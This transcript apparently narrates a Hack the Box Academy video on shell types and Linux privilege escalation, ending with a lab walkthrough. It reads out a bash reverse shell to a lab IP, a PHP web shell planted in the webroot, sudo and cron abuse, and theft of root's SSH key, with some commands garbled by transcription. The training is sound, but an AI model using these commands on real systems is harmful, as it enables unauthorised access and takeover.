Hi, this is Sleeper. Welcome back to my channel. We are continuing the Getting Started module from Hack the Box Academy. If you need access to Hack the Box Academy, you can sign up with the link below. Keep in mind, Hack the Box Academy and the main Hack the Box website are two separate accounts with different plans available. I recommend the Silver Annual Plan as it gives you access to all the job role paths, all the modules up to Tier 2, and an exam voucher good for any of the Hack the Box certifications. So let's go ahead and continue. Types of shells. Once we compromise a system and exploit a vulnerability to execute commands on the compromised hosts remotely, we usually need a method of communicating with the system not to have to keep exploiting the same vulnerability to execute each command. To enumerate the system or take further control over it or within its network, we need a reliable connection that gives us direct access to the system's shell. For example, Bash or PowerShell, so we can thoroughly investigate the remote system for our next move. One way to connect to a compromised system is through network protocols like SSH for Linux or WinRM for Windows, which would allow us a remote login to the compromised system. However, unless we obtain a working set of login credentials, we would not be able to utilize these methods without executing commands on the remote system first to gain access to these services in the first place. The other method of accessing a compromised host for control and remote code execution is through shells. As previously discussed, there are three main types of shells: reverse shell, bind shell, and web shell. Each of these shells has a different method of communication with us for accepting and executing our commands. Type of shell: reverse shell, connects back to our system and gives us control through a reverse connection. Bind shell waits for us to connect to it and gives us control once we do. And a web shell communicates through a web server, accepts our commands through HTTP parameters, executes them, and prints back the output. Let us dive more deeply into each of the above shells and walk through examples of each. Reverse shell. A reverse shell is the most common type of shell, as it is the quickest and easiest method to obtain control over a compromised host. Once we identify a vulnerability on the remote host that allows remote code execution, we can start a netcat listener on our machine that listens on a specific port, say port 1234. With this listener in place, we can execute a reverse shell command that connects the remote system's shell, Bash or PowerShell, to our netcat listener, which gives us a reverse connection over the remote system. Netcat listener. The first step is to start a netcat listener on a port of our choosing. So netcat NVLP 1234. The flags we are using are the following. So L, listening mode, to wait for a connection to connect to us. V, verbose mode, so that we know when we receive a connection. -N, disable DNS resolution and only connect from or to IPs to speed up the connection. And -P to specify the port number netcat is listening on and the reverse connection should be sent to. Now that we have a netcat listener waiting for our connection, we can execute the reverse shell command that connects to us. So connect back IP. However, first we need to find our system's IP to send a reverse connection back to us. We can find our IP with the following command, IPA. In our example, the IP we are interested in is under ton0, which is the same Hack the Box network we connected to through our VPN. Note, we are connecting to the IP in ton0 because we can only connect to Hack the Box boxes through the VPN connection, as they do not have internet connection and therefore cannot connect to us over the internet using ETH0. In a real pen test, you may be directly connected to the same network or performing an external penetration test, so you may connect through the ETH-O adapter or similar. Reverse shell command. The command we execute depends on what operating system the compromised host runs on, for example, Linux or Windows, and what applications and commands we can access. The Payload All the Things page has a comprehensive list of reverse shell commands we can use that cover a wide range of options depending on our compromised host. Certain reverse shell commands are more reliable than others and can usually be attempted to get a reverse connection. The below commands are reliable commands we can use to get a reverse connection for Bash on Linux compromised hosts and PowerShell on Windows compromised hosts. So bash-c, bash-i, caret, ampersand, \dev, /tcp, /rip 10.10.10.10, \1234 our port, o, caret, ampersand 1, end quote. And the following there. So you can copy those. We can utilize the exploit we have over the remote host to execute one of the above commands, for example through a Python exploit or a Metasploit module, to get a reverse connection. Once we do, we should receive a connection in our netcat listener. So now we're listening and connected to 10.10.10 from 10.10.10.1. And as we can see, after we received a connection on our netcat listener, we were able to type our command and directly get its output back right in our machine. A reverse shell is handy when we want to get a quick, reliable connection to our compromised host. However, a reverse shell can be very fragile. Once the reverse shell command is stopped, or if we lose our connection for any reason, we would have to use the initial exploit to execute the reverse shell command again to regain our access. Bind shell. Another type of shell is a bind shell. Unlike a reverse shell that connects to us, we'll have to connect to it on the target's listening port. Once we execute a bind shell command, it will start listening on a port on the remote host and bind that host's shell, Bash or PowerShell, to that port. We have to connect to that port with netcat, and we will get control through a shell on that system. So bind shell command. Once again, we can utilize the Payload All the Things to find a proper command to start our bind shell. Note, we will start a listening connection on port 1234 on the remote host with IP 0.0.0.0 so that we can connect to it from anywhere. The following are reliable commands we can use to start a bind shell. So Bash, Python, and PowerShell. Netcat connection. Once we execute the bind shell command, we should have a shell waiting for us on the specified port. We can now connect to it. We can use netcat to connect to that port and get a connection to the shell. So netcat 10.10.10.1, port 1234. As we can see, we are directly dropped into a bash session and can interact with the target system directly. Unlike a reverse shell, if we drop our connection to a bind shell for any reason, we can connect back to it and get another connection immediately. However, if the bind shell command is stopped for any reason, or if the remote host is rebooted, we would still lose our access to the remote host, and we'll have to exploit it again to gain access. Upgrading TTY. Once we connect to a shell through netcat, we will notice that we can only type commands or backspace, but we cannot move the text cursor left or right to edit our commands, nor can we go up and down to access the command history. To be able to do that, we will need to upgrade our TTY. This can be achieved by mapping our terminal TTY with the remote TTY. There are multiple methods to do this. For our purposes, we will use the Python/stty method. In our netcat shell, we will use the following command to use Python to upgrade the type of our shell to a full TTY. So python-c quote import pty semicolon pty.spawn parentheses double quote \bin /bash end quote parenthesis single quote. There we go. After we run this command, we will hit Control-Z to background our shell and get back on our local terminal and input the following stty command. So Control-Z, stty, raw-echo, and foreground. Once we hit FG, or foreground, it will bring back our netcat shell from the to the foreground. At this point, the terminal will show a blank line. We can hit Enter again to get back to our shell, or input Reset and hit Enter to bring it back. At this point, we would have a fully working TTY shell with command history and everything else. We may also notice that our shell does not cover the entire terminal. To fix this, we need to figure out a few variables. We can open another terminal window on our system, maximize the windows, or use any size we want, and then input the following commands to get our variables. So echo $term, stty size. The first command showed us the term variable, and the second shows us the values for rows and columns, respectively. Now that we have our variables, we can go back to our netcat shell and use the following command to correct them. So export term equals xterm dash 256 color and stty rows 67 and columns 318. Once we do that, we should have a netcat shell that uses the terminal's full features, just like an SSH connection. Web shell. The final type of shell we have is a web shell. A web shell is typically a web script, for example, PHP or ASPX, that accepts our command through HTTP request parameters such as GET or POST request parameters, executes our command, and prints its output back on the web page. Writing a web shell. First of all, we need to write our web shell that would take our command through a GET request, execute it, and print its output back. A web shell script is typically a one-liner that is very short and can be memorized easily. The following are some common short web shell scripts for common web languages. PHP, JSP, and ASP. Uploading a web shell. Once we have our web shell, we need to place our web shell script into the remote host's web directory, webroot, to execute the script through the web browser. This can be through a vulnerability in an upload feature, which would allow us to write one of our shells to a file, for example, shell.php, and upload it, and then access our uploaded file to execute commands. However, if we only have remote code execution through an exploit, we can write our shell directly to the webroot to access it over the web. So the first step is to identify where the webroot is. The following are the default webroutes for common web servers. So at Apache web server, we've got var HTML. For an Nginx web server, user local Nginx HTML. For an IIS web server, we're at c initpub root, and xampp, we're at c xampp htdocs. We can check these directories to see which webroot is in use, and then use echo to write out our web shell. For example, if we are attacking a Linux host running Apache, we can write a PHP shell with the following command. So echo our PHP shell from above into our web root directory /shell.php. Then accessing our web shell. Once we write our web shell, we can either access it through a browser or by using curl. We can visit shell.php page on the compromised website and use $cmd equals ID to execute the ID command. Another option is to use curl. So curl HTTP server import /shell.php $cmd equals ID. As we can see, we can keep changing the command to get its output. A great benefit of a web shell is that it would bypass any firewall restriction in place, as it will not open a new connection on a port, but run on the web port on 80 or 443, or whatever port the web application is using. Another great benefit is that if the compromised host is rebooted, the web shell would still be in place, and we can access it and get command execution without exploiting the remote host again. On the other hand, a web shell is not as interactive as reverse or bind shells, and bind shells are, since we have to keep requesting a different URL to execute our commands. Still, in extreme cases, it is possible to code a Python script to automate this process and give us a semi-interactive web shell right within our terminal. Privilege escalation. Our initial access to a remote server is usually in the context of a low-privileged user, which would not give us complete access over the box. To gain full access, we will need to find an internal or local vulnerability that would escalate our privileges to the root user on Linux or the administrator/system user on Windows. Let us walk through some common methods of escalating our privileges. So privesc checklist. Once we gain initial access to a box, we want to thoroughly enumerate the box to find any potential vulnerabilities we can exploit to achieve a higher privilege level. We can find many checklists and cheat sheets online that have a collection of checks we can run and the commands to run these checks. One excellent resource is Hacktricks, which has an excellent checklist for both Linux and Windows local privilege escalation. Another excellent repository is Payload All the Things, which also has checklists for both Linux and Windows. We must start experimenting with various commands and techniques and get familiar with them to understand multiple weaknesses that can lead to escalating our privileges. Enumeration scripts. Many of the above commands may be automatically run with a script to go through the report and look for any weaknesses. We can run many scripts to automatically enumerate the server by running common commands that return any interesting findings. Some of the common Linux enumeration scripts include linenum and Linux priv checker, and for Windows include seatbelt and JAWS, or WinPs, as it mentions in the next section. Another useful tool we may use for server enumeration is Privilege Escalation Awesome Scripts Suite, PEAS, as it is well maintained to remain up to date and includes scripts for both enumerating both Linux and Windows. Note, these scripts will run many commands known for identifying vulnerabilities and create a lot of noise that may trigger antivirus software or security monitoring software that looks for these types of events. This may prevent the scripts from running or even trigger an alarm that the system has been compromised. In some systems, we may want to do a manual enumeration instead of running scripts. Let's take a look at an example of running the Linux script from PEAS called linpeas on Linux. So we're running our script, and as we can see, once the script runs, it starts collecting information and displaying it an excellent report. Let us discuss some of the vulnerabilities that we should look for in the output of these scripts. Kernel exploits. Whenever we encounter a server running an old operating system, we should start by looking for potential kernel vulnerabilities that may exist. Suppose the server is not being maintained with the latest updates and patches. In that case, it is likely vulnerable to specific kernel exploits found on unpatched versions of Linux and Windows. For example, the above script showed us the Linux version to be 3.9.0-73 generic. If we Google exploits for this version or use SearchSploit, we would find a CVE 2016 5195, otherwise known as Dirty Cow. We can search for and download the Dirty Cow exploit and run it on the server to gain root access. Same concept also applies to Windows, as there are many vulnerabilities in unpatched or older versions of Windows, with various vulnerabilities that can be used for privilege escalation. We should keep in mind that kernel exploitation can cause system instability, and we should take great care before running them on production systems. It is best to try them in a lab environment and only run them on production systems with explicit approval and coordination with our client. Vulnerable software. Another thing we should look for is installed software. For example, we can use the dpkg-l command on Linux or look at our program files in Windows to see what software is installed on the system. We should look for public exploits for any installed software, especially if any older versions are in use, containing unpatched vulnerabilities. User privileges. Another critical aspect to look for after gaining access to a server is the privileges available to the user we have access to. Suppose we are allowed to run specific commands as root or as another user. In that case, we may be able to escalate our privileges to root or system users or gain access as a different user. Below are some common ways to exploit certain user privileges: sudo, suid, and Windows token privileges. The sudo command in Linux allows a user to execute commands as a different user. It is usually used to allow lower privileged users to execute commands as root without giving them access to the root user. This is generally done as specific commands can only be run as root, like tcp dump, or allow the user to access certain root-only directories. We can check what sudo privileges we have with the sudo-l command. The above output says that we can run all commands with sudo, which gives us complete access, and we can use the su command with sudo to switch to the root user. So sudo su. The above command requires a password to run any commands with sudo. There are certain occasions where we may be able to or may be allowed to execute certain applications or all applications without having to provide a password. The no password entry shows that the bin/echo command can be executed without a password. This would be useful if we gained access to the server through a vulnerability and did not have the user's password. As it says user, we can run sudo as that user and not as root. To do so, we can specify the user with -u, user. Once we find a particular application we can run with sudo, we can look for ways to exploit it to get a shell as the root user. GTFO bins contains a list of commands and how they can be exploited through sudo. We can search for the application we have sudo privilege over, and if it exists, it may tell us the exact command we should execute to gain root access using the sudo privilege we have. LOLBAS also contains a list of Windows applications which we may be able to leverage to perform certain functions, like downloading files or executing commands in the context of a privileged user. scheduled tasks. In both Linux and Windows, there are methods to have scripts run at specific intervals to carry out a task. Some examples are having an antivirus scan run every hour, or a backup script that runs every 30 minutes. There are usually two ways to take advantage of scheduled tasks in Windows or cron jobs in Linux to escalate our privileges. Number 1, adding a new scheduled task or cron job. Or number 2, trick them to execute a malicious software. The easiest way is to check if we are allowed to add new scheduled tasks. In Linux, a common form of maintaining scheduled tasks is through cron jobs. There are specific directories that we may be able to utilize to add new cron jobs if we have the right permissions over them. These include etc cron tab, etc-cron.d, var spool cron, crontabs /root. If we can write to a directory called by a cron job, we can write a bash script with a reverse shell command, which should send us a reverse shell when executed. Exposed credentials. Next, we can look for files that we can read and see if they contain any exposed credentials. This is very common with configuration files, log files, and user history files, bash history in Linux, and ps readline in Windows. The enumeration scripts we discussed at the beginning usually look for potential passwords in files and provide them to us as below. As we can see, the database password, password123, is exposed, which would allow us to log into the local MySQL databases and look for interesting information. We may also check for password reuse, as the system user may have used their password for the databases, which may allow us to use the same password to switch to that user as follows. We may also use the user credentials to SSH into the server as that user. SSH keys. Finally, let's discuss SSH keys. If we have read access over the .ssh directory for a specific user, we may read their private SSH keys found in /home/user.ssh/id_RSA or in root.ssh/id_RSA and use it to log into the server. If we can read the root.ssh directory and can read the ID RSA file, we can copy it to our machine and use the -i flag to log in with it. Note that we use the command chmod 600 ID RSA on the key after we created it on our machine to change the file's permissions to be more restrictive. If SSH keys have lax permissions, for example, maybe read by other people, the SSH server would prevent them from working. If we find ourselves with write access to a user's .ssh directory, we can place our public key in the user's SSH directory at home/users/.ssh/authorized keys. This technique is usually used to gain SSH access after gaining a shell as that user. The current SSH configuration will not accept keys written by other users, so it will only work if we have already gained control over that user. We must first create a new key with SSH-keygen and the -f flag to specify the output file. This will give us two files, a key, which we will use with the SSH-i, and key.pub, which we will copy to the remote machine. Let us copy key.pub, then on the remote machine, we will add it to the root.ssh/authorized keys directory. Now the remote server should allow us to log in as that user by using our private key. As we can see, now we can SSH in as the root user. The Linux privilege escalation and the Windows privilege escalation modules go into more details on how to use each of these methods for privilege escalation and many others as well. So we've got a few questions here. SSH into the server above with the provided credentials, user1 and password1, and use the -p to specify the port as shown, 41561. Once you log in, try to find a way to move to user2 and get the flag in home user2 flag.txt. Once you gain access to user2, try to find a way to escalate your privileges to root to get the flag in root flag.txt. So let's go ahead and do that. I'm going to go full screen here for an easier view. So user1 SSH user1 at paste. It didn't copy it over. We'll copy it again. Paste and specify the port number -p. Go. Yes. Password 1. Okay, so we're in here. Who am I? And we want to see, like it mentioned, if we can do any sudo commands. So we may be able to run that as, so let's try it. Sudo su user2. Enter password. So password 1. So our user1 is not allowed to execute su. So let's just try cancel that. Slash bin bash to run a command as a different user. Okay, so sudo -u user2 bin bash. So let's try that. So sudo -u user2 bin bash. Bin bash. And then, who am I? I'm user2 now. Okay, so we'll go back to user2's. Doing this one-handed, so bear with me. List and cat our flag. Lateral movement to another user. Great. So we got our first flag. And paste it in. Okay, now we need to escalate our privileges. Let's see if there's anything in sudo. Password for user2, not sure. But we can list cd. Let us just grab linps real quick. Or linum even. The shell command and the raw. just going to copy all this. And we can do linoleum. Linoleum.sh if it'll let us. No. Okay. So I'm just going to paste this in. And see if that works. Cron jobs. It mentioned that. Okay, so it is running. Anything of use. PHP read write. So we can see if we can write to that maybe. Etsy cron.d. Okay, so we'll go through this. If anything pops out here. Root. Question is, what are the privileges already? This might be useful. You can downgrade to the vulnerable version for testing purposes. It's saying CVE 2021 3156. So let's see if we can CVE 2021 3156. Exploit DB. Oops. Opened in a new window. Let's see what this has to say. Buffer overflow, privilege escalation. Let's jump back. Oh, you probably didn't see that because I'm only sharing one screen. Let's see if it loaded any other information here. Into script. Okay, so let's say ID. Let's just see if we can go there. That's my question. So, alright. We didn't even need to escalate here. Unless, oh, I need to add a space there. Permission denied. Ah, I see. So you can get there, but read, write, execute. user2. So cd.ssh list. So cat ID RSA. Okay. So we'll copy this. Oops. Put this down for a second. Okay. So we're just going to try to SSH in as root with the key. And we did chmod 600 to ID RSA. So SSH root, hopefully, at our IP address with our port number, password. Oh, forgot a step. -I ID RSA, and we are who? Who am I? All right, and we're root. So we can cd to root directory if we can list, and cat our flag.txt. Privilege escalation is privilege escalation to root. Perfect. All right, so that's how you privilege escalate with one hand. All right. So we'll go ahead and stop here for today. Once again, my name is Sleeper, and that's a wrap. Until next time. Hello, hackers. In addition to your learning through Hack the Box Academy, HackTheBox.com offers additional machines and challenges to test your skills. Like I mentioned, it is a separate account from the Academy side with different plans available. You can sign up with the second link below. I recommend the annual VIP Plus plan that gives you access to all the retired machines, which can help you prepare for the CPTS, PNPT, or OSCP. It also offers your own personal instance for boxes and unlimited time with the Pwnbox, which is the in-browser attacker machine. It's what I use for these videos, and it's so convenient. Other than that, good luck on your journey into information security, and here are some more videos to choose from.